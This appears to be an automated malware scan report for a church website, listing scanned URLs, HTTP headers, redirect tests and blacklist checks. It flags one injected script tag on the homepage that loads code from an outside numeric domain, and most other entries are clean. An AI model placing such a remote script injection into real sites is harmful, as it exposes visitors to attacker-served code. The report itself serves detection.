Scanned pages/files
Request | Server response | Status |
http://kbaptistchurch.org/ | 200 OK Content-Length: 24901 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://3522557477.com/stooper.php?id=123281"></script> | ||
http://kbaptistchurch.org/rvsincludefile/rvsheadpage.js | 200 OK Content-Length: 1 Content-Type: application/javascript | clean |
http://kbaptistchurch.org/rvsincludefile/rvsnavigator.js | 200 OK Content-Length: 3494 Content-Type: application/javascript | clean |
http://kbaptistchurch.org/js/publishNavigator/layersmenu-library.js | 200 OK Content-Length: 6047 Content-Type: application/javascript | clean |
http://kbaptistchurch.org/js/publishNavigator/layersmenu.js | 200 OK Content-Length: 7007 Content-Type: application/javascript | clean |
http://kbaptistchurch.org/rvsincludefile/rvscustomopenwindow.js | 200 OK Content-Length: 1046 Content-Type: application/javascript | clean |
http://3522557477.com/stooper.php?id=121193 | HTTP/1.1 302 Found Connection: close Date: Sun, 01 Mar 2015 08:17:17 GMT Location: http://bing.com Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Type: text/html X-Powered-By: PHP/5.3.24 | clean |
http://bing.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Date: Sun, 01 Mar 2015 08:17:19 GMT Location: http://www.bing.com/ Server: Microsoft-IIS/8.5 Content-Length: 0 Edge-Control: no-store P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Set-Cookie: _HOP=I=1&TS=1425197839; domain=bing.com; path=/ X-MSEdge-Ref: Ref A: 6D7C94C214A2409F8377406BFA844167 Ref B: 935CE668705D1569B417BDDB77D68865 Ref C: Sun Mar 01 00:17:19 2015 PST | clean |
http://www.bing.com/ | 200 OK Content-Length: 57087 Content-Type: text/html | clean |
http://www.bing.com/?scope=web&FORM=Z9LH | 200 OK Content-Length: 57203 Content-Type: text/html | clean |
http://www.bing.com/?scope=images&FORM=Z9LH1 | 200 OK Content-Length: 57220 Content-Type: text/html | clean |
http://www.bing.com/?scope=video&FORM=Z9LH2 | 200 OK Content-Length: 57215 Content-Type: text/html | clean |
http://www.bing.com/news?FORM=Z9LH3 | 200 OK Content-Length: 88285 Content-Type: text/html | clean |
http://www.bing.com/rms/rms%20answers%20News%20Vertical$newsSmartRefresh/jc/06505c61/092426a2.js?y | 200 OK Content-Length: 674 Content-Type: application/x-javascript | clean |
http://www.bing.com/rms/news4B/jc/f44b81d8/0e31551f.js?bu=rms+answers+News+Vertical%24domready%2cVertical%24newsBrowseCommonV6%2cVertical%24scroller%2cVertical%24baseInst%2cVertical%24makehomepage&y | 200 OK Content-Length: 11956 Content-Type: application/x-javascript | clean |
http://www.bing.com/search?q=&FORM=HDRSC1 | HTTP/1.1 302 Found Cache-Control: private Date: Sun, 01 Mar 2015 08:17:21 GMT Location: /?scope=web&mkt=en-ww&FORM=HDRSC1 Server: Microsoft-IIS/8.5 Vary: Accept-Encoding Content-Length: 158 Content-Type: text/html; charset=utf-8 Edge-Control: no-store P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Set-Cookie: _FS=NU=1; domain=.bing.com; path=/ Set-Cookie: _HOP=I=1&TS=1425197842; domain=.bing.com; path=/ Set-Cookie: _SS=SID=EF34BE8C7BB24DCF9AB69F1370290ECF; domain=.bing.com; path=/ Set-Cookie: SRCHD=AF=HDRSC1; expires=Tue, 28-Feb-2017 08:17:22 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=9AD480317B174729B761A2B4BB25226B; expires=Tue, 28-Feb-2017 08:17:22 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20150301; expires=Tue, 28-Feb-2017 08:17:22 GMT; domain=.bing.com; path=/ Set-Cookie: _EDGE_S=F=1&SID=2B75E261C6E56BEF1CD7E53CC7016AE4; path=/; httponly; domain=bing.com Set-Cookie: _EDGE_V=1; path=/; httponly; expires=Tue, 28-Feb-2017 08:17:22 GMT; domain=bing.com Set-Cookie: MUID=15786D77072460A008B76A2A06C06172; path=/; expires=Tue, 28-Feb-2017 08:17:22 GMT; domain=bing.com Set-Cookie: MUIDB=15786D77072460A008B76A2A06C06172; path=/; httponly; expires=Tue, 28-Feb-2017 08:17:22 GMT X-MSEdge-Ref: Ref A: B38B8A45C35245B0A822D6E2A5001141 Ref B: 4157DC487B5F0C0485F4B71FC24F8FD7 Ref C: Sun Mar 01 00:17:22 2015 PST | clean |
http://www.bing.com/?scope=web&mkt=en-ww&form=hdrsc1 | 200 OK Content-Length: 57249 Content-Type: text/html | clean |
http://www.bing.com/explore?FORM=Z9LH4 | 200 OK Content-Length: 28508 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kbaptistchurch.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 Mar 2015 08:17:02 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.4.28
GET / HTTP/1.1
Host: kbaptistchurch.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 Mar 2015 08:17:02 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.4.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: kbaptistchurch.org
Referer: http://www.google.com/search?q=kbaptistchurch.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kbaptistchurch.org
Referer: http://www.google.com/search?q=kbaptistchurch.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kbaptistchurch.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kbaptistchurch.org/
Result: kbaptistchurch.org is not infected or malware details are not published yet.
Result: kbaptistchurch.org is not infected or malware details are not published yet.